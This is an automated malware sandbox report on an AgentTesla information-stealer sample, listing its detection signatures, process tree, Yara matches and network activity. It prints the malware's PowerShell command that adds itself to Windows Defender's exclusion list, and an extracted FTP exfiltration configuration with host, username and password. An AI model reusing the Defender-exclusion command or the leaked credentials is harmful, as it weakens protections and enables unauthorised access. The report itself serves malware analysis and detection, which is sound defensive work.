Windows Analysis Report
hesaphareketi__20241001.exe

Overview

General Information

Sample name: hesaphareketi__20241001.exe
Analysis ID: 1524784
MD5: 5eaafeca7053687b46ecffad93c82418
SHA1: 457566502545fecd8ea9f2249b755135cd03b69b
SHA256: 27ff307b514230b2363e2284e1d57df50bc8a59b5cf8c732dc32d5587d472c64
Tags: AgentTesla, exe, geo, TUR, user-abuse_ch
Infos:

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Connects to many ports of the same IP (likely port scanning)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • hesaphareketi__20241001.exe (PID: 5732 cmdline: "C:\Users\user\Desktop\hesaphareketi__20241001.exe" MD5: 5EAAFECA7053687B46ECFFAD93C82418)
    • powershell.exe (PID: 6204 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi__20241001.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 2636 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • hesaphareketi__20241001.exe (PID: 2360 cmdline: "C:\Users\user\Desktop\hesaphareketi__20241001.exe" MD5: 5EAAFECA7053687B46ECFFAD93C82418)
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.normagroup.com.tr", "Username": "admin@normagroup.com.tr", "Password": "Qb.X[.j.Yfm["}
Source | Rule | Description | Author | Strings
00000005.00000002.4608159738.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000005.00000002.4608159738.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000005.00000002.4610095898.0000000002D71000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000002.2149976039.00000000048DA000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000002.2149976039.00000000048DA000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Source | Rule | Description | Author | Strings
0.2.hesaphareketi__20241001.exe.4bd6010.2.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0.2.hesaphareketi__20241001.exe.4bd6010.2.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0.2.hesaphareketi__20241001.exe.4bd6010.2.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen
  • 0x31219:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x3128b:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x31315:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x313a7:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x31411:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x31483:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x31519:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x315a9:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.hesaphareketi__20241001.exe.4bd6010.2.unpack | MALWARE_Win_AgentTeslaV2 | AgenetTesla Type 2 Keylogger payload | ditekSHen
  • 0x2e6da:$s2: GetPrivateProfileString
  • 0x2ddd1:$s3: get_OSFullName
  • 0x2f384:$s5: remove_Key
  • 0x2f511:$s5: remove_Key
  • 0x30452:$s6: FtpWebRequest
  • 0x311fb:$s7: logins
  • 0x3176d:$s7: logins
  • 0x34450:$s7: logins
  • 0x34530:$s7: logins
  • 0x35e2e:$s7: logins
  • 0x350ca:$s9: 1.85 (Hash, version 2, native byte-order)
5.2.hesaphareketi__20241001.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

                  System Summary

                  Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi__20241001.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi__20241001.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\hesaphareketi__20241001.exe", ParentImage: C:\Users\user\Desktop\hesaphareketi__20241001.exe, ParentProcessId: 5732, ParentProcessName: hesaphareketi__20241001.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi__20241001.exe", ProcessId: 6204, ProcessName: powershell.exe
                  Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi__20241001.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi__20241001.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\hesaphareketi__20241001.exe", ParentImage: C:\Users\user\Desktop\hesaphareketi__20241001.exe, ParentProcessId: 5732, ParentProcessName: hesaphareketi__20241001.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi__20241001.exe", ProcessId: 6204, ProcessName: powershell.exe
                  No Suricata rule has matched

                  AV Detection

                  Source: 0.2.hesaphareketi__20241001.exe.4bd6010.2.raw.unpack, Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.normagroup.com.tr", "Username": "admin@normagroup.com.tr", "Password": "Qb.X[.j.Yfm["}
                  Source: ftp.normagroup.com.tr, Virustotal: Detection: 12%
                  Source: http://ftp.normagroup.com.tr, Virustotal: Detection: 12%
                  Source: hesaphareketi__20241001.exe, ReversingLabs: Detection: 75%
                  Source: hesaphareketi__20241001.exe, Virustotal: Detection: 27%
                  Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                  Source: hesaphareketi__20241001.exe, Joe Sandbox ML: detected
                  Source: hesaphareketi__20241001.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: hesaphareketi__20241001.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: Xk.pdbSHA256 source: hesaphareketi__20241001.exe
                  Source: Binary string: Xk.pdb source: hesaphareketi__20241001.exe

                  Networking

                  Source: global traffic, TCP traffic: 104.247.165.99 ports 49744,61673,59991,61434,62425,59911,54398,53275,1,2,53982,49774,50773,51305,60182,21,57937
                  Source: Yara match, File source: 0.2.hesaphareketi__20241001.exe.4b5a1f0.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, type: UNPACKEDPE
                  Source: global traffic, TCP traffic: 192.168.2.5:49747 -> 104.247.165.99:59911
                  Source: Joe Sandbox View, IP Address: 104.247.165.99
                  Source: Joe Sandbox View, ASN Name: ASN-QUADRANET-GLOBALUS
                  Source: unknown, FTP traffic detected: 104.247.165.99:21 -> 192.168.2.5:49746
                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                      220-You are user number 3 of 50 allowed.
                      220-Local time is now 10:13. Server port: 21.
                      220-This is a private system - No anonymous login
                      220-IPv6 connections are also welcome on this server.
                      220 You will be disconnected after 15 minutes of inactivity.
                  Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global traffic, DNS traffic detected: DNS query: ftp.normagroup.com.tr
                  Source: hesaphareketi__20241001.exe, 00000005.00000002.4610095898.0000000003014000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi__20241001.exe, 00000005.00000002.4610095898.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi__20241001.exe, 00000005.00000002.4610095898.0000000002E47000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://ftp.normagroup.com.tr
                  Source: hesaphareketi__20241001.exe, 00000000.00000002.2149506599.00000000032CD000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi__20241001.exe, 00000005.00000002.4610095898.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: hesaphareketi__20241001.exe, 00000000.00000002.2149976039.00000000048DA000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi__20241001.exe, 00000005.00000002.4608159738.0000000000402000.00000040.00000400.00020000.00000000.sdmp, String found in binary or memory: https://account.dyn.com/

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  Source: 0.2.hesaphareketi__20241001.exe.4bd6010.2.raw.unpack, SKTzxzsJw.cs, .Net Code: TFawXa
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe, Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\hesaphareketi__20241001.exe
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe, Window created: window name: CLIPBRDWNDCLASS

                  System Summary

                  Source: 0.2.hesaphareketi__20241001.exe.4bd6010.2.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
                  Source: 0.2.hesaphareketi__20241001.exe.4bd6010.2.unpack, type: UNPACKEDPE, Matched rule: AgenetTesla Type 2 Keylogger payload, Author: ditekSHen
                  Source: 5.2.hesaphareketi__20241001.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
                  Source: 5.2.hesaphareketi__20241001.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: AgenetTesla Type 2 Keylogger payload, Author: ditekSHen
                  Source: 0.2.hesaphareketi__20241001.exe.4b5a1f0.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
                  Source: 0.2.hesaphareketi__20241001.exe.4b5a1f0.0.raw.unpack, type: UNPACKEDPE, Matched rule: AgenetTesla Type 2 Keylogger payload, Author: ditekSHen
                  Source: 0.2.hesaphareketi__20241001.exe.4bd6010.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
                  Source: 0.2.hesaphareketi__20241001.exe.4bd6010.2.raw.unpack, type: UNPACKEDPE, Matched rule: AgenetTesla Type 2 Keylogger payload, Author: ditekSHen
                  Source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
                  Source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, type: UNPACKEDPE, Matched rule: AgenetTesla Type 2 Keylogger payload, Author: ditekSHen
                  Source: hesaphareketi__20241001.exe, 00000000.00000002.2149976039.00000000048DA000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameTyrone.dll8 vs hesaphareketi__20241001.exe
                  Source: hesaphareketi__20241001.exe, 00000000.00000002.2149976039.00000000048DA000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamecef57186-8600-43f5-9c05-f8d076dd51f0.exe4 vs hesaphareketi__20241001.exe
                  Source: hesaphareketi__20241001.exe, 00000000.00000002.2170370887.0000000007650000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamePowerS vs hesaphareketi__20241001.exe
                  Source: hesaphareketi__20241001.exe, 00000000.00000002.2170370887.0000000007650000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamePowerShell.EXEj% vs hesaphareketi__20241001.exe
                  Source: hesaphareketi__20241001.exe, 00000000.00000002.2171826753.000000000A710000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameTyrone.dll8 vs hesaphareketi__20241001.exe
                  Source: hesaphareketi__20241001.exe, 00000000.00000002.2147318995.000000000143E000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameclr.dllT vs hesaphareketi__20241001.exe
                  Source: hesaphareketi__20241001.exe, 00000000.00000000.2135243423.0000000000D62000.00000002.00000001.01000000.00000003.sdmp, Binary or memory string: OriginalFilenameXk.exe2 vs hesaphareketi__20241001.exe
                  Source: hesaphareketi__20241001.exe, 00000000.00000002.2149506599.00000000032CD000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamecef57186-8600-43f5-9c05-f8d076dd51f0.exe4 vs hesaphareketi__20241001.exe
                  Source: hesaphareketi__20241001.exe, 00000005.00000002.4608940593.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameclr.dllT vs hesaphareketi__20241001.exe
                  Source: hesaphareketi__20241001.exe, 00000005.00000002.4608596388.0000000000BD9000.00000004.00000010.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameUNKNOWN_FILET vs hesaphareketi__20241001.exe
                  Source: hesaphareketi__20241001.exe, 00000005.00000002.4608159738.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamecef57186-8600-43f5-9c05-f8d076dd51f0.exe4 vs hesaphareketi__20241001.exe
                  Source: hesaphareketi__20241001.exe, Binary or memory string: OriginalFilenameXk.exe2 vs hesaphareketi__20241001.exe
                  Source: 0.2.hesaphareketi__20241001.exe.4bd6010.2.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 0.2.hesaphareketi__20241001.exe.4bd6010.2.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 5.2.hesaphareketi__20241001.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 5.2.hesaphareketi__20241001.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 0.2.hesaphareketi__20241001.exe.4b5a1f0.0.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 0.2.hesaphareketi__20241001.exe.4b5a1f0.0.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 0.2.hesaphareketi__20241001.exe.4bd6010.2.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 0.2.hesaphareketi__20241001.exe.4bd6010.2.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: hesaphareketi__20241001.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 0.2.hesaphareketi__20241001.exe.4bd6010.2.raw.unpack, 4JJG6X.cs, Cryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.hesaphareketi__20241001.exe.4bd6010.2.raw.unpack, 8C78isHTVco.cs, Cryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.hesaphareketi__20241001.exe.4bd6010.2.raw.unpack, CqSP68Ir.cs, Cryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.hesaphareketi__20241001.exe.4bd6010.2.raw.unpack, CqSP68Ir.cs, Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: 0.2.hesaphareketi__20241001.exe.4b5a1f0.0.raw.unpack, GxasrEb6btbl4ZlyPy.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, GxasrEb6btbl4ZlyPy.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, pMceRfjydasvB3AEin.cs, Security API names: _0020.SetAccessControl
                  Source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, pMceRfjydasvB3AEin.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, pMceRfjydasvB3AEin.cs, Security API names: _0020.AddAccessRule
                  Source: 0.2.hesaphareketi__20241001.exe.a710000.6.raw.unpack, GxasrEb6btbl4ZlyPy.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.hesaphareketi__20241001.exe.a710000.6.raw.unpack, pMceRfjydasvB3AEin.cs, Security API names: _0020.SetAccessControl
                  Source: 0.2.hesaphareketi__20241001.exe.a710000.6.raw.unpack, pMceRfjydasvB3AEin.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.hesaphareketi__20241001.exe.a710000.6.raw.unpack, pMceRfjydasvB3AEin.csSecurity API names: _0020.AddAccessRule
                  Source: 0.2.hesaphareketi__20241001.exe.4b5a1f0.0.raw.unpack, pMceRfjydasvB3AEin.csSecurity API names: _0020.SetAccessControl
                  Source: 0.2.hesaphareketi__20241001.exe.4b5a1f0.0.raw.unpack, pMceRfjydasvB3AEin.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.hesaphareketi__20241001.exe.4b5a1f0.0.raw.unpack, pMceRfjydasvB3AEin.csSecurity API names: _0020.AddAccessRule
                  Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/6@1/1
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hesaphareketi__20241001.exe.log
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe Mutant created: NULL
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2924:120:WilError_03
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3hty4xym.goh.ps1
                  Source: hesaphareketi__20241001.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: hesaphareketi__20241001.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe File read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: hesaphareketi__20241001.exe ReversingLabs: Detection: 75%
                  Source: hesaphareketi__20241001.exe Virustotal: Detection: 27%
                  Source: unknown Process created: C:\Users\user\Desktop\hesaphareketi__20241001.exe "C:\Users\user\Desktop\hesaphareketi__20241001.exe"
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi__20241001.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe Process created: C:\Users\user\Desktop\hesaphareketi__20241001.exe "C:\Users\user\Desktop\hesaphareketi__20241001.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi__20241001.exe"
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe Process created: C:\Users\user\Desktop\hesaphareketi__20241001.exe "C:\Users\user\Desktop\hesaphareketi__20241001.exe"
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                  Source: Window Recorder Window detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                  Source: hesaphareketi__20241001.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: hesaphareketi__20241001.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: hesaphareketi__20241001.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: Xk.pdbSHA256 source: hesaphareketi__20241001.exe
                  Source: Binary string: Xk.pdb source: hesaphareketi__20241001.exe

                  Data Obfuscation

                  Source: hesaphareketi__20241001.exe, frmListContacts.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.hesaphareketi__20241001.exe.4b5a1f0.0.raw.unpack, pMceRfjydasvB3AEin.cs .Net Code: bS50r79wDG System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.hesaphareketi__20241001.exe.40aa230.1.raw.unpack, MainForm.cs .Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.hesaphareketi__20241001.exe.40c2450.3.raw.unpack, MainForm.cs .Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.hesaphareketi__20241001.exe.7890000.5.raw.unpack, MainForm.cs .Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, pMceRfjydasvB3AEin.cs .Net Code: bS50r79wDG System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.hesaphareketi__20241001.exe.a710000.6.raw.unpack, pMceRfjydasvB3AEin.cs .Net Code: bS50r79wDG System.Reflection.Assembly.Load(byte[])
                  Source: hesaphareketi__20241001.exe Static PE information: 0xF298BC3E [Mon Dec 22 14:12:14 2098 UTC]
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe Code function: 0_2_015DF112 pushad ; iretd 0_2_015DF119
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe Code function: 0_2_055DCE50 push eax; ret 0_2_055DF4E1
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe Code function: 0_2_055DFDC0 push eax; mov dword ptr [esp], ecx 0_2_055DFDD4
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe Code function: 0_2_07577C80 pushad ; ret 0_2_07577C81
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exe Code function: 0_2_07A3A14D push FFFFFF8Bh; iretd 0_2_07A3A14F
                  Source: hesaphareketi__20241001.exe Static PE information: section name: .text entropy: 7.728445191379543
                  Source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, DeAfCSDBU9yLGhUV22.csHigh entropy of concatenated method names: 'FRDAmdgBCW', 'kdTAojAMPe', 'v7QuHgLoUd', 'C8iu2RpDhy', 'FFyuQTx5tY', 'NgBuZMrGn3', 'Ldku1QceXT', 'CIyuJXm5W6', 'bIqugSbYYW', 'DIiufs1CYU'
                  Source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, jSRXYtvBwkQC7BKMXG.csHigh entropy of concatenated method names: 'R5RsKuZgC9', 'bR2s8QGSBd', 'SRHsAwEpve', 'mNjsYSbm6s', 'QVWsjNGdRa', 'E2lAxfvA58', 'St7AwCF7fc', 'kiMAGTANPx', 'uejAB378SJ', 'no6AReu0IU'
                  Source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, M3Tk9D7EuWvvcB5aAS.csHigh entropy of concatenated method names: 'ToString', 'ALrcdGVykS', 'Qt2ctf4S0O', 'KnLcHGU4XW', 'Ph2c2iagvq', 'xX7cQjluuu', 'V6bcZVZ0yt', 'bBuc1pXpqj', 'yQQcJiR1O2', 'P6xcgAsq09'
